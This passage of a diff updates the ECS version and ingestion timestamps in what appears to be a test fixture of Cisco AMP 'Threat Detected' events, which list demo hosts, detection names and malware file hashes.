"sha1\":\"cea0890d4b99bae3f635a16dae71f69d137027b9\",\"md5\":\"8b88ebbb05a0e56b7dcc708498c02b3e\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2400,7 +2400,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -2422,7 +2422,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:17.581778666Z",
+                "ingested": "2021-09-13T18:06:53.271944235Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258981346935000,\"timestamp\":1610705834,\"timestamp_nanoseconds\":346000000,\"date\":\"2021-01-15T10:17:14+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258981346934873\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2479,7 +2479,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -2501,7 +2501,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:17.581780563Z",
+                "ingested": "2021-09-13T18:06:53.271946131Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258929807327000,\"timestamp\":1610705822,\"timestamp_nanoseconds\":334000000,\"date\":\"2021-01-15T10:17:02+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258929807327320\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2558,7 +2558,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -2590,7 +2590,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:17.581782448Z",
+                "ingested": "2021-09-13T18:06:53.271948047Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668103677542000,\"timestamp\":1610705695,\"timestamp_nanoseconds\":470000000,\"date\":\"2021-01-15T10:14:55+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668103677542427\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2647,7 +2647,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -2675,7 +2675,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:17.581784321Z",
+                "ingested": "2021-09-13T18:06:53.271949953Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668103677542000,\"timestamp\":1610705695,\"timestamp_nanoseconds\":112000000,\"date\":\"2021-01-15T10:14:55+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668103677542426\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2732,7 +2732,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -2764,7 +2764,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:17.581786193Z",
+                "ingested": "2021-09-13T18:06:53.271951854Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668103677542000,\"timestamp\":1610705695,\"timestamp_nanoseconds\":71000000,\"date\":\"2021-01-15T10:14:55+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668103677542425\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2821,7 +2821,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -2853,7 +2853,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:17.581788054Z",
+                "ingested": "2021-09-13T18:06:53.271953745Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667841684537000,\"timestamp\":1610705634,\"timestamp_nanoseconds\":532000000,\"date\":\"2021-01-15T10:13:54+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533667841684537367\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2910,7 +2910,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -2938,7 +2938,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:17.581790080Z",
+                "ingested": "2021-09-13T18:06:53.271955687Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667841684537000,\"timestamp\":1610705634,\"timestamp_nanoseconds\":454000000,\"date\":\"2021-01-15T10:13:54+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6533667841684537366\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2995,7 +2995,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -3027,7 +3027,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:17.581791973Z",
+                "ingested": "2021-09-13T18:06:53.271957592Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667841684537000,\"timestamp\":1610705634,\"timestamp_nanoseconds\":80000000,\"date\":\"2021-01-15T10:13:54+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533667841684537365\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3084,7 +3084,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -3106,7 +3106,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:17.581793892Z",
+                "ingested": "2021-09-13T18:06:53.271959511Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258118058508000,\"timestamp\":1610705633,\"timestamp_nanoseconds\":636000000,\"date\":\"2021-01-15T10:13:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258118058508361\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3163,7 +3163,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -3191,7 +3191,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:17.581795768Z",
+                "ingested": "2021-09-13T18:06:53.271961417Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667837389570000,\"timestamp\":1610705633,\"timestamp_nanoseconds\":689000000,\"date\":\"2021-01-15T10:13:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533667837389570068\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3248,7 +3248,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -3270,7 +3270,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:17.581797669Z",
+                "ingested": "2021-09-13T18:06:53.271963308Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258066518901000,\"timestamp\":1610705621,\"timestamp_nanoseconds\":608000000,\"date\":\"2021-01-15T10:13:41+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258066518900808\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3327,7 +3327,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -3349,7 +3349,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:17.581799549Z",
+                "ingested": "2021-09-13T18:06:53.271965221Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258014979293000,\"timestamp\":1610705609,\"timestamp_nanoseconds\":581000000,\"date\":\"2021-01-15T10:13:29+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258014979293255\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3406,7 +3406,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -3428,7 +3428,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:17.581801458Z",
+                "ingested": "2021-09-13T18:06:53.271967114Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176257963439686000,\"timestamp\":1610705597,\"timestamp_nanoseconds\":569000000,\"date\":\"2021-01-15T10:13:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176257963439685702\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3485,7 +3485,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -3517,7 +3517,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:17.581803331Z",
+                "ingested": "2021-09-13T18:06:53.271969012Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667579691532000,\"timestamp\":1610705573,\"timestamp_nanoseconds\":778000000,\"date\":\"2021-01-15T10:12:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533667579691532307\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3574,7 +3574,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -3602,7 +3602,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:17.581805234Z",
+                "ingested": "2021-09-13T18:06:53.271970883Z",
